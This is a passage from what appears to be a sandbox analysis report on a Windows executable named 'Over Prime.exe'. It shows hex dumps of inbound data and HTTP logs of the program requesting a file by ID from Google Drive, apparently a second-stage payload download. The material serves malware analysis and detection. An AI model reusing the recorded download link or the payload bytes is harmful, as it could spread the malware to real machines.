e1 a2 08 dc 75 f2 5b 67 68 25 7d 95 33 87 b5 7a 87 f1 54 10 f0 d8 2c 6f b9 50 a6 0d c5 ee 29 45 4c 3f 28 44 10 48 ca fb 9f 26 0b 5e 61 4c 07 86 6e 78 c0 a0 81 Data Ascii: "l}~dO_&9TJv0AH]EDU{p=Pkgcl0@xT(f7^%DbWU1%y5cue;?<sU~;{<jL<4elIN>Q"b@~wVTZ~dR]u[gh%}3zT,oP)EL?(DH&^aLnx
2022-05-30 12:45:08 UTC	454	IN	Data Raw: 16 88 02 e5 40 1d 60 88 88 3a df 87 1f 19 1b 10 fe 0f 69 71 0b de a0 05 45 7a d7 b2 02 3d 0d 8d 45 a2 e6 2d ef ff 94 03 ce 3e 81 39 98 44 e7 5f 89 5f 82 d6 6b 19 46 c2 04 b0 77 30 86 5c fe 55 5e 39 c8 c7 45 b5 21 f9 55 3c 57 2e 39 fc e9 82 c1 30 5c de 09 19 a7 52 e7 1a c1 c0 c4 e9 9a f7 96 9d 88 7a b3 51 03 32 f6 9b 1f 6d 55 81 3b c9 98 d3 88 da 4f b1 31 20 4b f0 c0 7b e9 c0 99 4b bb 0d 04 83 3e 17 43 e0 2c 93 b0 b8 37 ce d9 37 2e 92 52 b3 f3 62 b1 a5 95 b4 d5 e8 cf 8b 2b 39 ac c1 95 8e d6 dc 41 a9 c4 b3 e4 ac f3 70 b5 f5 fa be 5f ed 8f 05 ff fb 9b d7 12 d7 76 d9 4f ac b8 5d ce f5 6f 3a 35 97 6c 39 e8 18 f9 43 af 4a 8e e6 e6 31 a5 63 c9 b8 c2 e9 6a a4 26 d7 21 1e b1 07 97 ef a3 06 a9 b6 ee 23 d6 a8 36 a8 52 00 fb 1c 5d 3d 81 e2 8b a1 94 c1 08 2b cd f4 dd Data Ascii: @`:iqEz=E->9D__kFw0\U^9E!U<W.90\RzQ2mU;O1 K{K>C,77.Rb+9Ap_vO]o:5l9CJ1cj&!#6R]=+
2022-05-30 12:45:08 UTC	456	IN	Data Raw: 8b d8 1e 5f 68 98 b3 e1 23 5d e2 0c 57 d4 e5 09 bd ff 5e b2 2d a0 d6 d7 a4 74 bf 67 8e 87 30 0c 10 64 a1 a7 1b 57 af a0 7e 88 08 ca 3d 3e 62 70 bd fb e4 78 37 54 ea bf 17 19 9f 8a 08 02 78 d5 30 2f 44 f2 f2 66 c3 43 dd c2 aa 47 e9 03 8d cd ae f2 57 9c e3 f2 6b a9 88 ee 9a 80 73 e5 65 00 76 b5 98 7c 89 31 f7 92 2b 67 8f a9 c9 bc c1 19 15 2e 22 84 d8 41 d3 46 bf 82 73 dc f6 4f af 35 46 b7 cc 2c e9 27 f8 5b db 64 65 6b a6 84 47 1b a3 fc 2c 0a 94 fd f0 8e 4a e7 98 82 4f 0d cc 12 ac 1e 2e 6c 6e b6 22 3a 4f a1 94 0c 50 f0 64 28 20 a8 9b ec 8e 81 03 59 cb 20 c6 cd 09 bf 77 53 b9 5e 15 00 30 5e f8 c7 34 9f 4c 79 aa 72 2e 40 6a a9 8b 6c b8 a4 c9 b3 0e a2 64 eb 73 e6 a0 bb 0a de 3a 3d b9 e6 f9 b5 4b 20 a7 85 c2 27 cd 2e 26 bb 4d 09 d3 83 30 1d fd 14 20 0a 96 74 80 Data Ascii: _h#]W^-tg0dW~=>bpx7Tx0/DfCGWksev\|1+g."AFsO5F,'[dekG,JO.ln":OPd( Y wS^0^4Lyr.@jlds:=K '.&M0 t
2022-05-30 12:45:08 UTC	457	IN	Data Raw: 73 03 26 78 f8 63 aa 37 f8 b8 d8 ee 73 95 16 68 87 06 61 43 cb a8 e4 c3 85 e8 a8 29 dd 7f a3 23 c1 a8 5e e3 8d e1 e6 47 7d 2d 4e d6 4f 03 5d 06 e5 22 3a 38 44 72 07 60 c5 b2 dd da 98 8b fb 0b 2c 41 ee 81 e2 05 6b 76 44 95 38 f7 c7 5b cb af 7b 8a f4 a6 6f c6 c0 68 de 1f 3e ce b6 f3 34 d0 48 43 35 a6 86 43 fd e8 d4 cc 4c db 14 fe 26 35 03 f2 03 68 fa d1 7c 64 e6 88 54 27 66 40 19 fe 8e af 61 0d c7 62 ce 88 03 6d cb 27 6e 12 18 2a 48 cd d9 94 20 2c f0 08 17 d5 c9 05 ec c0 12 59 f3 70 a1 0f 6b e9 b3 78 db 02 a8 0c 62 d9 ea 9a 97 70 e6 0e 90 62 48 39 4b e2 92 01 bf 6e f6 3b 9b 61 67 22 91 a1 fa cd a1 10 10 2e f4 33 8c 71 1a c8 58 49 cf 27 8e 87 b5 72 c7 98 fa 77 f0 ce 90 62 60 e4 d5 78 49 cf 5c cd 59 d7 bc 50 e5 97 dd ed 86 51 26 00 21 d8 91 05 dc f3 f0 bf 9d Data Ascii: s&xc7shaC)#^G}-NO]":8Dr`,AkvD8[{oh>4HC5CL&5h\|dT'f@abm'n*H ,YpkxbpbH9Kn;ag".3qXI'rwb`xI\YPQ&!
2022-05-30 12:45:08 UTC	458	IN	Data Raw: e9 3b bb 44 a4 f8 02 ae 10 2f c1 d6 a5 97 0f db 6b 90 44 9b 42 da d9 fc b6 35 44 a7 2f 11 57 85 4b ed 62 88 18 06 a9 c8 01 79 15 78 18 d5 c4 3b 43 f0 df 80 6a ed c5 65 4e 76 f7 20 8a 78 38 c9 a5 db a6 91 5d f4 2a 76 1d 05 6c ed 99 11 38 70 25 e3 f0 e3 3b d8 2c 53 4d 40 17 dc c5 53 2a 47 1c e1 44 3c 25 a2 41 b6 7e 42 ab 0d 38 75 8d 72 ce 98 15 97 ff c3 a4 59 8d cd 9a e0 11 42 c9 2c 74 10 c4 56 7f 01 f2 bd da a0 7f 16 60 25 ee 62 32 56 08 27 dc 10 bc 01 e9 8b 6c b9 b5 2e 90 1e 67 25 fc 4b 46 f7 fe bd 66 54 94 05 32 03 0c 8a 32 eb 96 d7 cf c6 90 a1 95 68 5d 4f e6 29 8a f5 ac 34 b0 65 55 ca 1a 82 46 6e 52 e6 c4 36 46 78 43 20 b7 e3 28 a1 db 2b b5 0b a2 10 27 b8 69 4f e1 bc 23 7e d9 95 76 92 d0 6a cd 0f 61 74 92 6f b7 3b fc b4 ee e2 64 99 b5 65 33 0b e0 4e 45 Data Ascii: ;D/kDB5D/WKbyx;CjeNv x8]vl8p%;,SM@SGD<%A~B8urYB,tV`%b2V'l.g%KFfT22h]O)4eUFnR6FxC (+'iO#~vjato;de3NE
2022-05-30 12:45:08 UTC	460	IN	Data Raw: ef c7 9e f6 6d b4 f1 9f 7e f4 0c 8f b8 a7 88 cc fc fc 95 1d c4 c7 be 3f d7 e6 b9 8b 42 a1 fc 54 33 90 87 f3 2a 28 da ff 0e 4d 15 4f 8a f7 ba 37 1b c7 c0 ae cd e9 0c d5 2c 5a b5 27 c9 bf 50 20 c5 2a f4 b9 88 6d ba 80 af 46 46 a9 d3 72 cb ed 37 62 c5 37 ac 73 c9 43 a3 6e 17 fa 39 9a ce 18 5a 14 8a 14 78 89 d7 a7 73 45 90 1c 42 68 c3 24 bd fb dd 5f 1f cf 62 56 81 92 09 99 ec 2e eb 85 ab e5 ff c2 63 21 06 4b ea a1 e7 53 cf 02 29 d9 96 c9 5e 4d 43 8f 4f a6 00 58 06 af 65 79 0b 9a ed df 2d 74 70 a6 e0 66 bf f5 dc fa 3f c9 ad 7a 15 ff 91 56 05 bc 09 d3 09 6b 7d 61 d4 99 77 2a 06 91 d4 48 5d b6 e0 d4 f5 57 70 02 a8 bd 4a 95 7d 30 7c 0d fb 18 ed 60 eb 40 78 48 be 5e 5e 79 22 fa b8 c0 b7 0e 94 84 21 0e b4 36 d5 49 a3 f5 a5 96 74 16 b4 ef 28 ae ac e2 b0 90 ae 9c dd Data Ascii: m~?BT3(MO7,Z'P mFFr7b7sCn9ZxsEBh$_bV.c!KS)^MCOXey-tpf?zVk}aw*H]WpJ}0\|`@xH^^y"!6It(
2022-05-30 12:45:08 UTC	461	IN	Data Raw: e3 31 6a aa 21 67 ce 31 b6 68 ef 0e 1d 45 2b c0 0e 42 51 e5 f2 c4 9e 32 3a b5 09 5d 33 2e a8 6e 64 d6 7f 4f c8 78 e4 e6 d8 be 9c da 66 d3 be c4 eb 55 07 e0 4b 70 81 c5 68 8f ca f9 10 5f 96 6f 37 dd 5c a2 e6 90 57 ee 3f f0 19 65 44 27 61 97 65 85 c2 79 3e f1 d7 10 72 d8 aa 6f 04 50 25 0d 42 ee 20 45 44 3f 30 44 20 48 c0 fb 97 26 32 5e af 4c 77 81 4c 7e 3f a6 37 45 ba c1 ce ad aa 4b 1f 9b 89 ae 78 09 bf 82 40 04 e2 6f 61 ce 9d 9a 0c f7 55 bf b6 b0 47 ec f5 c4 46 b5 61 ec 85 26 fc 77 78 e3 7c c6 f8 da d6 42 58 2e e7 fd 81 97 82 5b 5a f3 e0 4a 14 17 91 cf db b6 fc 50 99 29 3d 49 24 72 21 d6 ad fd 0d 4a c5 cb 87 75 6a be 54 cc 08 04 0e 57 66 96 f8 c1 11 2c 76 fe 9d 1f a4 e2 39 57 ab 22 2f 80 33 d3 e4 cc 2a fd e1 bf c2 8a 43 c1 0b ba fd 92 96 cd f6 fd af 1c e0 Data Ascii: 1j!g1hE+BQ2:]3.ndOxfUKph_o7\W?eD'aey>roP%B ED?0D H&2^LwL~?7EKx@oaUGFa&wx\|BX.[ZJP)=I$r!JujTWf,v9W"/3*C
2022-05-30 12:45:08 UTC	462	IN	Data Raw: f3 e1 9a 92 36 b9 4a cc 5b 35 f2 90 77 b0 be 61 52 a6 22 b7 b5 eb 99 88 1d 3a 42 c1 36 8e 66 dd 54 a9 fb b3 1f ac d3 70 3d fa 4d b1 71 ec f7 04 c1 fa 98 d6 c1 d6 26 d8 ec ac 0e 5d 99 f5 d9 39 67 97 67 39 4b 18 67 43 93 4b cc e7 b3 30 9f 62 0d be 7d ef b2 a2 0b d1 41 18 db 01 bf ea e7 03 26 b2 0c 20 67 ab 6c 94 3c 9c 3e 20 2b 01 d2 df 45 ae af cf ef 25 b3 fa 7f 4c 02 6e 40 71 96 7e f1 6a 4f 07 63 4c ad 33 df 91 18 f7 5b e2 34 2b b8 de f3 36 7e 68 47 94 bb 07 1c b5 dd 28 31 05 82 ce 79 15 86 84 36 8c 48 dd c5 11 e9 47 dc 19 68 3d 35 aa 5a cb 52 55 17 b7 22 01 fe 2a 87 47 a5 6e ab e7 a7 9d 0d f2 ab 69 16 a6 28 c9 69 59 76 29 7b 02 93 39 93 a2 bc 86 ff d7 58 ff 6c 32 e0 31 9b 58 0a f7 c4 73 7a 35 ae 32 07 a9 34 64 dd 32 4a 6b f5 0d 33 46 0f c3 fa 40 38 e7 5d Data Ascii: 6J[5waR":B6fTp=Mq&]9gg9KgCK0b}A& gl<> +E%Ln@q~jOcL3[4+6~hG(1y6HGh=5ZRU"*Gni(iYv){9Xl21Xsz524d2Jk3F@8]
2022-05-30 12:45:08 UTC	463	IN	Data Raw: 0c 5b dc 64 3d 6b ff 84 04 1b db fc 7b 0a f0 fe a9 8d e9 e5 c5 89 ec 07 04 27 60 cb fe 59 72 80 76 0c e7 a6 cd 08 13 f5 4e 2d 36 ab 7e ef 4d 81 ed 59 71 21 c4 cc 0c be 03 5d a8 51 07 0f 6b 51 48 cb d7 93 b9 75 5f 7e a9 4c e4 a5 3b 60 27 ae a7 b9 59 a8 74 e1 86 ed 75 b0 bf d5 58 35 11 ef be bc 90 28 54 8d ca e0 d5 19 e2 8c 6d 3e ec 84 49 1a a7 13 d4 0d 68 73 6e dc 92 04 5d 7b e2 b3 37 3c cd 8c df aa 24 29 79 fb de 06 fe 3b 63 3c 56 41 5b 5a 2b 5a f3 d3 f3 1b fd c0 d2 b2 69 32 5b 5f 8d 56 0f 3a f2 c4 c2 b5 a5 f9 11 3c 4a 2e c3 fd 22 83 6b 31 df de a7 19 b3 6d fb a5 e5 ff 24 d6 ae c8 10 92 fc 74 b1 5f dc 3f 5a 96 ac 61 25 8a 3c c2 99 d8 8e d1 44 ba 29 2b 4c fa c1 71 ea ca 94 41 c4 07 0d 89 25 1d 76 ea 1b 99 a1 b2 da c7 2a 3e de 9b 43 85 d0 04 d5 93 53 80 60 Data Ascii: [d=k{'`YrvN-6~MYq!]QkQHu_~L;`'YtuX5(Tm>Ihsn]{7<$)y;c<VA[Z+Zi2[_V:<J."k1m$t_?Za%<D)+LqA%v*>CS`
2022-05-30 12:45:08 UTC	465	IN	Data Raw: 7a 85 4c 60 0e 2b 24 19 85 2f c3 c8 7f 91 69 29 b8 0d 37 d0 da 00 16 c6 5d 5e 66 77 37 08 d0 ee 67 7f 18 05 6f 0b 67 df e8 9c 31 76 45 08 53 64 85 3f 7f 8b ab 38 4f 57 b6 02 d0 68 3a 2b ed a8 c4 c4 67 19 e0 27 63 3a 34 78 96 c1 ce 40 a7 2f f1 8f d4 7a 94 90 b8 7f 35 c6 58 6a 9e ec ca 70 42 c7 63 c5 70 df ec 58 bc 9f 6b e6 0d 5a c5 0b 77 d3 cb 0e 9a f8 46 b5 43 a7 a1 d0 d4 73 b0 60 97 80 37 0b 10 63 a0 a0 1c 50 a6 a7 61 8f 18 cd cc 38 9a 76 57 fd 04 7e 15 51 c0 ba 2c 1c d3 8f 7a 07 0b d0 a5 2a f1 f7 d2 8c e7 79 a9 f8 86 7d f1 09 8e c7 aa f8 c5 96 89 f9 6c a2 ba e5 46 8b 83 ee ea 0b cc be 3d 77 c5 39 a2 9a 75 6f a6 a1 08 b4 0e 11 ba 26 7e 8d f2 f2 9e 75 80 b1 e0 ef 07 4f 62 35 f2 b7 69 2c 9f 27 08 5d d0 62 39 6d e3 82 08 1d db fa 7b 0c f0 f8 a9 8b e9 e3 c5 Data Ascii: zL`+$/i)7]^fw7gog1vESd?8OWh:+g'c:4x@/z5XjpBcpXkZwFCs`7cPa8vW~Q,z*y}lF=w9uo&~uOb5i,']b9m{
2022-05-30 12:45:08 UTC	465	IN	Data Raw: ca 43 15 74 5d eb 41 b3 72 d7 b1 de 0e c9 9c 58 3c ed 81 7c 55 c9 f2 83 8d f5 3b 53 92 5b 3b e9 4c 96 ae a4 73 da 30 f4 1a 61 2b 23 b4 93 e5 81 45 7c 69 f7 8c 16 54 de 8a 69 1b 56 ca 0b d5 e8 3b 43 b2 38 c0 43 36 4e ea fd b1 20 53 58 15 4a 71 80 32 7e 8e a6 45 46 22 c3 6f a1 0d 47 76 94 fd a1 89 06 5c 8d 9a 0a 8f 61 d5 c7 64 93 dd fe ba b4 02 95 ff d9 6d f1 8a 80 2b e9 8f 23 31 73 a5 e7 0a c2 00 dd e2 46 6d 2a b2 f9 c3 93 47 5f 1e f1 de 49 0b 14 85 cc c0 b5 ca 53 b5 2a 2e 4a 35 71 cd d5 4e fe de 4a 15 ca fd 74 02 bf 12 c2 58 0a b5 58 f3 99 00 ce 8b 23 bf f2 5c 12 c2 e9 59 5c c9 29 16 8b 14 da c1 c5 a2 f4 5f b6 e6 9d 6b f6 07 8d c1 a5 86 ce e0 fe 97 1f c4 c5 bb 3d dd e4 a0 89 4d a3 00 56 c1 92 97 f1 3c 2a f1 fd 37 4f 3a 4d 97 f5 d8 35 7b c5 a6 ac a9 eb 55 Data Ascii: Ct]ArX<\|U;S[;Ls0a+#E\|iTiV;C8C6N SXJq2~EF"oGv\adm+#1sFmG_IS.J5qNJtXX#\Y\)_k=MV<*7O:M5{U
2022-05-30 12:45:08 UTC	467	IN	Data Raw: e0 ba 04 a5 fc 79 b7 fc d7 b7 e9 ea 13 02 60 fc 24 d0 ba d0 26 de 23 ab 71 5b 13 f3 3f 3f 7d 92 16 3c ae 1d bf 46 1e 4f 55 e3 16 34 0a 66 6b bd 50 ec 45 a0 33 d3 09 1a b6 03 96 eb a9 02 cf b2 1b 20 61 ab 84 ab c4 03 c6 1f b3 01 d2 5f e8 9c 7b fd 98 16 5d f9 66 48 04 6b d0 74 39 7b 18 6f b8 02 e0 49 08 36 bc 97 68 f1 2a e4 6a 2d 51 d8 03 30 8d 6e 9d 92 9b 01 37 b3 cc 2e 3b 03 86 c8 75 13 42 83 a6 8b 33 db 4c 19 5b 4f 0b 11 98 35 ca a2 b9 c3 6c 5e 72 bc 3b 0a c0 21 af 4c b8 65 7d ec 26 96 7e f8 ed 63 5e ac 4c c3 d6 54 ac 24 53 0f 8a 34 f4 af c8 8b 22 dd 70 f4 36 39 f4 3a 68 53 31 fc f4 78 92 3d 42 3a 36 a0 49 6d b5 3b 9b 62 03 04 e7 4f 33 ca 0b 48 53 ef 89 ce ce 38 0b bf 3e 57 c9 2b 4a 6b db d3 26 49 59 7e 75 e0 79 b8 66 dc a5 d5 16 c2 b4 53 04 e6 a5 77 b1 Data Ascii: y`$&#q[??}<FOU4fkPE3 a_{]fHkt9{oI6h*j-Q0n7.;uB3L[O5l^r;!Le}&~c^LT$S4"p69:hS1x=B:6Im;bO3HS8>W+Jk&IY~uyfSw

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49767	142.250.186.110	443	C:\Users\user\Desktop\Over Prime.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-30 12:45:57 UTC	468	OUT	GET /uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-05-30 12:45:57 UTC	468	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 May 2022 12:45:57 GMT Location: https://doc-0g-2k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959//1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-QR-UU4jtr4TuP5CjBoS8IQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version= Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49768	142.250.185.65	443	C:\Users\user\Desktop\Over Prime.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-30 12:45:58 UTC	469	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959/*/1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0g-2k-docs.googleusercontent.com Connection: Keep-Alive
2022-05-30 12:45:58 UTC	470	IN	HTTP/1.1 403 Forbidden X-GUploader-UploadID: ADPycduwc9a0y_kTiYLXFvp25BR7xAbtijbZpn2hg4Hk-rSx8YpgO-TpqITrSn2xcl6_T1no0LL12Nqi3dmRCmV1c0mIljAnpC95 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment Access-Control-Allow-Methods: GET,HEAD,OPTIONS Date: Mon, 30 May 2022 12:45:58 GMT Expires: Mon, 30 May 2022 12:45:58 GMT Cache-Control: private, max-age=0 Content-Length: 0 Server: UploadServer Content-Type: text/html; charset=UTF-8 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49769	142.250.186.110	443	C:\Users\user\Desktop\Over Prime.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-30 12:45:58 UTC	473	OUT	GET /uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
2022-05-30 12:45:58 UTC	474	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 May 2022 12:45:58 GMT Location: https://doc-0g-2k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959//1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-platform=, ch-ua-platform-version= Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-73zBoF7_L3-ybvqEyST5hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp" Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]} Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49770	142.250.185.65	443	C:\Users\user\Desktop\Over Prime.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-30 12:45:58 UTC	475	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959/*/1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0g-2k-docs.googleusercontent.com Connection: Keep-Alive
2022-05-30 12:45:59 UTC	476	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdswUSIHyWdNnmWAoexKsuNrOuHcgBp60QgGeRBr7epFugjlyrwockq20yMIbouFmMh42QttnppwyOevOY5dKrsR1nCzc9gn Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, 